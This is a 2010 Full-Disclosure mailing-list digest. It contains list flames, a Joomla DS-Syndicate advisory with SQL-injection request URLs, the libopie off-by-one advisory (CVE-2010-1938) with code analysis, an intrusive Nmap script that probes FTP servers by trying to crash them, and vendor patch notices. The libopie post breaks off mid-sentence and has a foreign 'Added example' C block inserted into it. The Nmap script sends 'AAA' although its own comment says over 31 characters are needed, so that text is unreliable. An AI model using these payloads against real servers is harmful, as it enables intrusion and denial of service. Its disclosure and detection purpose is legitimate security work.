Re: [Full-disclosure] To the police who torment, harass and stalk me.
On 27/05/2010 02:23, ☣frank^2 wrote:
> On Wed, May 26, 2010 at 7:15 AM, n3pt...@london.com wrote:
>> I am a question to the world, Not an answer to be heard. All a moment that's held in your arms. And what do you think you'd ever say? I won't listen anyway… You don't know me, And I'll never be what you want me to be.
>> snip
>
> Pick up the pace! Enemy, show me what you wanna be. I can handle anything, even if I can't handle you. Readily, either way it better be. Don't you fucking pity me. Get up, get off. What the hell I'm saying i don't know about malevolent. Sure as hell decadent. I want someone to step up step off. Walls, let me fall, fuck you all. Get a grip, don't let me slip 'till i drop the ball.
> snip

I'm a little teapot
Short and stout
Here is my handle
Here is my spout

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in DS-Syndicate for Joomla
Hello Benji!

It's good that you are drawing attention to my advisories, but very often your letters are unequal and not serious. So I've put you in my blacklist. I already wrote a recommendation to the list for people to use their time wisely. And because you can't do it by yourself (as is clear), I'll help you. I hope now you'll start using your time more wisely.

> so you've moved from discovering leet xss vulnerabilities

I'm discovering any vulnerabilities which I meet during my research. I have no prejudice against any of the classes from WASC TC v1/v2. If you have some problems with XSS or any other class of vulnerabilities, they're your own problems (as I already mentioned to the list concerning moaning about XSS).

> to publishing old exploits?

I don't think it's old. While there are web sites with this vulnerability, it'll not be old and will stay actual. I found these vulnerabilities in 2009 at one web site (and after my announcement in 2010 I checked it on other web sites), so at that time there were sites with these holes, and now there are sites with them. And in my second advisory about DS-Syndicate, which I published even before you wrote me your letter, I wrote about new vulnerabilities which I recently found in this plugin. So if you were looking for some fresh holes, you could easily have found them.

> I would offer you a sec. job, but unfortunately I think you're too qualified.

Thanks for the offer :-). But I don't need offers from not serious people (including you). Also note that from my side, I'd never offer you a security job, because I need only serious employees. It's my main criterion for all kinds of jobs, including security jobs.
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

----- Original Message -----
From: Benji
To: MustLive
Cc: full-disclosure@lists.grok.org.uk
Sent: Sunday, May 23, 2010 1:55 PM
Subject: Re: [Full-disclosure] Vulnerabilities in DS-Syndicate for Joomla

oh cool, so you've moved from discovering leet xss vulnerabilities to publishing old exploits? I would offer you a sec. job, but unfortunately I think you're too qualified.

On Sat, May 22, 2010 at 4:09 PM, MustLive <mustl...@websecurity.com.ua> wrote:

Hello Full-Disclosure!

I want to warn you about security vulnerabilities in the plugin DS-Syndicate for Joomla.

- Advisory: Vulnerabilities in DS-Syndicate for Joomla
- URL: http://websecurity.com.ua/4003/
- Affected products: all versions of DS-Syndicate for Joomla.
- Timeline:
  16.08.2009 - found vulnerabilities.
  04.03.2010 - announced at my site. After making the announcement of these vulnerabilities, I found that this SQLi vulnerability had already been found in 2008 by boom3rang (before I found it in 2009), who disclosed an exploit for it at milw0rm.com (http://www.milw0rm.com/exploits/6792). So boom3rang first found the SQLi, and I first found the Full path disclosure in this plugin.
  09.03.2010 - informed the developer (and at the developer's site I found that he no longer supports this plugin, after his site on Joomla was hacked).
  21.05.2010 - disclosed at my site.
- Details:
  These are SQL Injection and Full path disclosure vulnerabilities.

  SQL Injection:
  http://site/index2.php?option=ds-syndicate&version=1&feed_id=-1%20or%20version()=5

  Full path disclosure:
  http://site/index2.php?option=ds-syndicate&version=1&feed_id=

  Note that the developer of the plugin doesn't support it anymore, so users of the plugin need to fix it by themselves.

Just after disclosure of these vulnerabilities, I also found new vulnerabilities in DS-Syndicate which I wrote about in a separate advisory.
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] libopie __readrec() off-by-one (FreeBSD ftpd remote PoC)
[ libopie __readrec() off-by-one (FreeBSD ftpd remote PoC) ]

Authors:
- Maksymilian Arciemowicz
- Adam 'pi3' Zabrocki

http://securityreason.com/achievement_securityalert/87
http://site.pi3.com.pl/adv/libopie-adv.txt
http://blog.pi3.com.pl/?p=111

Date:
- Dis.: 04.05.2010
- Pub.: 27.05.2010

CVE: CVE-2010-1938
CWE: CWE-193

Affected Software:
- OPIE Authentication System ( libopie )

Software which uses libopie:
- OpenSuSE
- wu-ftpd
- mod_opie
- PAM
- openssh (modified by FreeBSD/DragonflyBSD Team)
- sudo
- opiesu
- popper
- Probably much more...

PoC:
- FreeBSD 8.0 ftpd(8) Remote Off-by-one

FreeBSD 7 is not affected. Other software can also be affected.

NOTE: Prior versions may also be affected.

Original URL: http://securityreason.com/achievement_securityalert/84

--- 0. Description ---

OPIE is a freely redistributable kit that will drop into most *IX systems and replaces your login and FTP daemon with versions that use OTP for user authentication. It also includes an OTP generator and a library to make it easy to add OTP authentication to existing clients and servers.

--- 1. OPIE Authentication System Off-by-one ---

Libopie allows REMOTE and LOCAL attackers an off-by-one attack (on the stack). Let's look at the code:

./src/contrib/opie/opie.h

  /* Maximum length of a principal (read: user name) */
  #define OPIE_PRINCIPAL_MAX 32

./src/contrib/opie/libopie/readrec.c

  int __opiereadrec FUNCTION((opie), struct opie *opie)
  {
  ...
  ...
    {
      char *c, principal[OPIE_PRINCIPAL_MAX];
      int i;

      if (c = strchr(opie->opie_principal, ':'))
        *c = 0;
  [1] if (strlen(opie->opie_principal) > OPIE_PRINCIPAL_MAX)
  [2]   (opie->opie_principal)[OPIE_PRINCIPAL_MAX] = 0;
  [3] strcpy(principal, opie->opie_principal);
  ...
  ...
    }
  ...
  ...
  ret:
    if (f)
      fclose(f);
    return rval;
  }

This function at [1] checks the length of the variable 'opie->opie_principal', which is fully user controlled. If this length is bigger than OPIE_PRINCIPAL_MAX (32 bytes), the program writes a NULL byte at that position.
In fact the string will then be 32 bytes long. The vulnerability exists at line [3]. The function strcpy() copies the user controlled variable, which can be at most 32 bytes long, into the local buffer 'principal', which is 32 bytes long too. Here is the off-by-one bug: after copying 32 bytes, strcpy() always ADDS a NULL byte to the end of the string. In fact it will land at position *(principal+32), which is outside the buffer.

A possible way to exploit this vulnerability:

./src/contrib/opie/libopie/lookup.c

  int opielookup FUNCTION((opie, principal), struct opie *opie AND char *principal)
  {
    int i;

    memset(opie, 0, sizeof(struct opie));
    opie->opie_principal = principal;
    if (i = __opiereadrec(opie))          <=== our call ;)
      return i;

    return (opie->opie_flags & __OPIE_FLAGS_RW) ? 0 : 2;
  }

A deeper analysis of the code shows:

./src/contrib/opie/libopie/challenge.c

  int opiechallenge FUNCTION((mp, name, ss), struct opie *mp AND char *name AND char *ss)
  {
    int rval = -1;

    rval = opielookup(mp, name);
  ...
  ...
    return rval;
  }

This function is really interesting because it is responsible for authentication, so this vulnerability can be reached in the pre-auth phase. We can find many programs which use this function for authorization (for example the default ftp daemon in FreeBSD) ;)

Another interesting call we can find here:

./src/contrib/opie/libopie/writerec.c

  int __opiewriterec FUNCTION((opie), struct opie *opie)
  {
    char buf[17], buf2[64];
    time_t now;
    FILE *f, *f2 = NULL;
    int i = 0;
    char *c;

    time(&now);
    if (strftime(buf2, sizeof(buf2), "%b %d,%Y %T", localtime(&now)) < 1)
      return -1;

    if (!(opie->opie_flags & __OPIE_FLAGS_READ)) {
      struct opie opie2;

      i = opielookup(&opie2, opie->opie_principal);   <== our call :)
  ...
    }
  ...
  ...
  }

and this function is used in many places:

./src/contrib/opie/libopie/passwd.c   <=== in function opiepasswd()
./src/contrib/opie/libopie/verify.c   <=== in function opieverify() - two times ;)
...

so we have got many entry points ;) But we are going to test calls to the function opiechallenge().
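To make the boundary described above measurable without corrupting any stack, here is an added C model of steps [1]-[3] (this is example code, not the advisory's or OPIE's): it counts the bytes strcpy() would write into the 32-byte 'principal' buffer for a given name, beside a hardened form of the check. The helper names and the hardened variant are this example's own assumptions, not the vendor patch.

```c
/* Added example: models the truncate-then-strcpy sequence of
 * __opiereadrec() so the off-by-one can be observed as a byte count.
 * Nothing here is OPIE code; function names are this example's own. */
#include <stdio.h>
#include <string.h>

#define OPIE_PRINCIPAL_MAX 32          /* same value as opie.h */

/* Copy the user-supplied name into a private work buffer and cut it at
 * the first ':' exactly as the library does before its length check. */
static void prepare(char *work, size_t worklen, const char *name)
{
    char *c;
    snprintf(work, worklen, "%s", name);
    if ((c = strchr(work, ':')) != NULL)
        *c = 0;
}

/* Original logic: truncate only when strlen > OPIE_PRINCIPAL_MAX, and
 * truncate at index OPIE_PRINCIPAL_MAX, so a 32-character name survives
 * intact.  Returns the number of bytes strcpy() at [3] would write into
 * principal[OPIE_PRINCIPAL_MAX]: the string plus its terminating NUL. */
size_t vulnerable_bytes_written(const char *name)
{
    char work[256];
    prepare(work, sizeof work, name);
    if (strlen(work) > OPIE_PRINCIPAL_MAX)           /* [1] */
        work[OPIE_PRINCIPAL_MAX] = 0;                 /* [2] */
    return strlen(work) + 1;                          /* what [3] writes */
}

/* Hardened variant (this example's assumption, not the vendor fix):
 * leave room for the NUL by truncating at OPIE_PRINCIPAL_MAX - 1
 * whenever the name is OPIE_PRINCIPAL_MAX bytes or longer. */
size_t fixed_bytes_written(const char *name)
{
    char work[256];
    prepare(work, sizeof work, name);
    if (strlen(work) >= OPIE_PRINCIPAL_MAX)
        work[OPIE_PRINCIPAL_MAX - 1] = 0;
    return strlen(work) + 1;
}

/* 1 when a copy of that many bytes runs past the 32-byte buffer. */
int overflows_principal(size_t bytes_written)
{
    return bytes_written > OPIE_PRINCIPAL_MAX;
}

/* Constructed test input: a name made of n 'A' characters. */
const char *make_name(size_t n)
{
    static char buf[200];
    if (n >= sizeof buf)
        n = sizeof buf - 1;
    memset(buf, 'A', n);
    buf[n] = 0;
    return buf;
}

int main(void)
{
    size_t n;
    /* 31 characters fit; from 32 upwards the original logic writes a
     * 33rd byte, which is the NUL landing at *(principal+32). */
    for (n = 30; n <= 40; n++) {
        size_t v = vulnerable_bytes_written(make_name(n));
        size_t f = fixed_bytes_written(make_name(n));
        printf("%2zu-char name: original writes %zu bytes (%s), hardened writes %zu\n",
               n, v, overflows_principal(v) ? "OVERFLOW" : "ok", f);
    }
    return 0;
}
```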
Pre-auth vulnerability sounds impressive ;) At first let's test the default FTP daemon of FreeBSD 8.0 ...

--- 2. FreeBSD 8.0 ftpd remote off-by-one ---

The authentication module of the FTP server in FreeBSD 8 was modified. By default it uses the OPIE library. Let's see http://www.freebsd.org/cgi/cvsweb.cgi/~checkout~/src/libexec/ftpd/ftpd.c?rev=1.214.2.1.2.1;content-type=text%2Fplain

  ...
  if (opiechallenge(&opiedata, name, opieprompt) == 0) {
    pwok = (pw != NULL) &&
           opieaccessfile(remotehost) &&
           opiealways(pw->pw_dir);
    reply(331, "Response to %s %s for %s.",
          opieprompt, pwok ? "requested" : "required", name);
  } else {
    pwok = 1;
    reply(331, "Password required for %s.", name);
  }
  askpasswd = 1;
  ...

this code has
[Full-disclosure] [ MDVSA-2010:109 ] gtk+2.0
Mandriva Linux Security Advisory MDVSA-2010:109
http://www.mandriva.com/security/

Package : gtk+2.0
Date    : May 27, 2010
Affected: 2008.0, 2009.0, 2009.1, Corporate 4.0, Enterprise Server 5.0

Problem Description:

A vulnerability was discovered and fixed in gtk+2.0:

gdk/gdkwindow.c in GTK+ before 2.18.5, as used in gnome-screensaver before 2.28.1, performs implicit paints on windows of type GDK_WINDOW_FOREIGN, which triggers an X error in certain circumstances and consequently allows physically proximate attackers to bypass screen locking and access an unattended workstation by pressing the Enter key many times (CVE-2010-0732).

Packages for 2008.0 and 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490

This update fixes this issue.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0732

Updated Packages:
Re: [Full-disclosure] To the police who torment, harass and stalk me.
They might be at your door. I recommend walking to your window and peeking outside every 120 seconds.

--
Freelance Web/Desktop Developer
http://fusecurity.com/ | Free Security Technology
http://www.rentacoder.com/
[Full-disclosure] [ MDVSA-2010:110 ] clamav
Mandriva Linux Security Advisory MDVSA-2010:110
http://www.mandriva.com/security/

Package : clamav
Date    : May 27, 2010
Affected: 2008.0, 2009.0, Corporate 4.0, Enterprise Server 5.0

Problem Description:

Multiple vulnerabilities were discovered and fixed in clamav:

The cli_pdf function in libclamav/pdf.c in ClamAV before 0.96.1 allows remote attackers to cause a denial of service (crash) via a malformed PDF file, related to an inconsistency in the calculated stream length and the real stream length (CVE-2010-1639).

Off-by-one error in the parseicon function in libclamav/pe_icons.c in ClamAV 0.96 allows remote attackers to cause a denial of service (crash) via a crafted PE icon that triggers an out-of-bounds read, related to improper rounding during scaling (CVE-2010-1640).

Packages for 2008.0 and 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490

This update provides clamav 0.96.1 which is not vulnerable to these issues.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1639
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1640

Updated Packages:
[Full-disclosure] ftp-libopie.nse in response to CVE-2010-1938
A vulnerability that has been published today affects the OPIE Authentication System (libopie). According to the researchers it could hit many systems like

- OpenSuSE
- wu-ftpd
- mod_opie
- PAM
- openssh (modified by FreeBSD/DragonflyBSD Team)
- sudo
- opiesu
- popper
- Probably much more...

Original advisory : http://securityreason.com/achievement_securityalert/87
See also : http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc

Please find attached their PoC as a script for Nmap.

Example Output :

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-libopie: Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)
|_See http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc

A.G.

description = [[
Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow).
Vulnerability discovered by Maksymilian Arciemowicz and Adam 'pi3' Zabrocki
]]

---
-- @output
-- PORT   STATE SERVICE
-- 21/tcp open  ftp
-- | ftp-libopie: Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)
-- |_See http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc

author = "Ange Gutek"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"intrusive"}

require "shortport"

portrule = shortport.port_or_service(21, "ftp")

action = function(host, port)
  local socket = nmap.new_socket()
  local result
  -- If we use more than 31 chars for username, ftpd will crash (quoted from the advisory).
  local user_account = "AAA"
  local status = true
  local err_catch = function()
    socket:close()
  end
  local try = nmap.new_try(err_catch)

  socket:set_timeout(1)
  try(socket:connect(host.ip, port.number, port.protocol))

  -- First, try a safe User so that we are sure that everything is ok
  local payload = "USER opie\r\n"
  try(socket:send(payload))
  status, result = socket:receive_lines(1)

  if status and not (string.match(result, "^421")) then
    -- Second, try the vulnerable user account
    local payload = "USER " .. user_account .. "\r\n"
    try(socket:send(payload))
    status, result = socket:receive_lines(1)
    if status then
      return
    else
      -- if the server does not answer anymore we may have reached a stack overflow condition
      return "Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)\nSee http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc"
    end
  else
    return
  end
  socket:close()
end

___
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
[Full-disclosure] [USN-945-1] ClamAV vulnerabilities
===
Ubuntu Security Notice USN-945-1                    May 27, 2010
clamav vulnerabilities
CVE-2010-1639, CVE-2010-2077
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 9.04:
  libclamav6  0.95.3+dfsg-1ubuntu0.09.04.2

Ubuntu 9.10:
  libclamav6  0.95.3+dfsg-1ubuntu0.09.10.2

Ubuntu 10.04 LTS:
  libclamav6  0.96.1+dfsg-0ubuntu0.10.04.1

In general, a standard system update will make all the necessary changes. For Ubuntu 10.04 LTS, this update uses a new upstream release, which includes additional bug fixes.

Details follow:

It was discovered that ClamAV did not properly reallocate memory when processing certain PDF files. A remote attacker could send a specially crafted PDF and crash ClamAV. (CVE-2010-1639)

An out of bounds memory access flaw was discovered in ClamAV. A remote attacker could send a specially crafted Portable Executable (PE) file and crash ClamAV. This issue only affected Ubuntu 10.04 LTS.
(CVE-2010-2077)

Updated packages for Ubuntu 9.04:
[Full-disclosure] VMSA-2010-0009 ESXi ntp and ESX Service Console third party updates
VMware Security Advisory

Advisory ID:   VMSA-2010-0009
Synopsis:      ESXi ntp and ESX Service Console third party updates
Issue date:    2010-05-27
Updated on:    2010-05-27 (initial release of advisory)
CVE numbers:   CVE-2009-2695 CVE-2009-2908 CVE-2009-3228 CVE-2009-3286
               CVE-2009-3547 CVE-2009-3613 CVE-2009-3612 CVE-2009-3620
               CVE-2009-3621 CVE-2009-3726 CVE-2007-4567 CVE-2009-4536
               CVE-2009-4537 CVE-2009-4538 CVE-2006-6304 CVE-2009-2910
               CVE-2009-3080 CVE-2009-3556 CVE-2009-3889 CVE-2009-3939
               CVE-2009-4020 CVE-2009-4021 CVE-2009-4138 CVE-2009-4141
               CVE-2009-4272 CVE-2009-3563 CVE-2009-4355 CVE-2009-2409
               CVE-2009-0590 CVE-2009-1377 CVE-2009-1378 CVE-2009-1379
               CVE-2009-1386 CVE-2009-1387 CVE-2009-4212 CVE-2009-1384
               CVE-2010-0097 CVE-2010-0290 CVE-2009-3736 CVE-2010-0001
               CVE-2010-0426 CVE-2010-0427 CVE-2010-0382

1. Summary

   ESXi update for ntp and ESX Console OS (COS) updates for COS kernel, openssl, krb5, gcc, bind, gzip, sudo.

2. Relevant releases

   VMware ESX 4.0.0 without patches ESX400-201005401-SG, ESX400-201005406-SG, ESX400-201005408-SG, ESX400-201005407-SG, ESX400-201005405-SG, ESX400-201005409-SG

3. Problem Description

 a. Service Console update for COS kernel

   Updated COS package kernel addresses the security issues that are fixed through versions 2.6.18-164.11.1.

   The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228, CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues fixed in kernel 2.6.18-164.6.1.

   The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621, CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1.
   The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2007-4567, CVE-2009-4536, CVE-2009-4537, CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1.

   The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080, CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020, CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to the security issues fixed in kernel 2.6.18-164.11.1.

   Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.

   VMware         Product   Running   Replace with/
   Product        Version   on        Apply Patch
   =============  =======   =======   =====================
   VirtualCenter  any       Windows   not affected

   hosted *       any       any       not affected

   ESXi           any       ESXi      not affected

   ESX            4.0       ESX       ESX400-201005401-SG
   ESX            3.5       ESX       not applicable
   ESX            3.0.3     ESX       not applicable
   ESX            2.5.5     ESX       not applicable

   vMA            4.0       RHEL5     affected, patch pending

   * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

 b. ESXi userworld update for ntp

   The Network Time Protocol (NTP) is used to synchronize the time of a computer client or server to another server or reference time source.

   A vulnerability in ntpd could allow a remote attacker to cause a denial of service (CPU and bandwidth consumption) by using MODE_PRIVATE to send a spoofed (1) request or (2) response packet that triggers a continuous exchange of MODE_PRIVATE error responses between two NTP daemons.

   The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-3563 to this issue.

   Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.
   VMware         Product   Running   Replace with/
   Product        Version   on        Apply Patch
   =============  =======   =======   =====================
   VirtualCenter  any       Windows   not affected

   hosted *       any       any       not affected

   ESXi           4.0       ESXi      ESXi400-201005401-SG
   ESXi           3.5       ESXi      affected, patch pending

   ESX            any       ESX       not applicable

   vMA            any       RHEL5     not applicable

   * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

 c. Service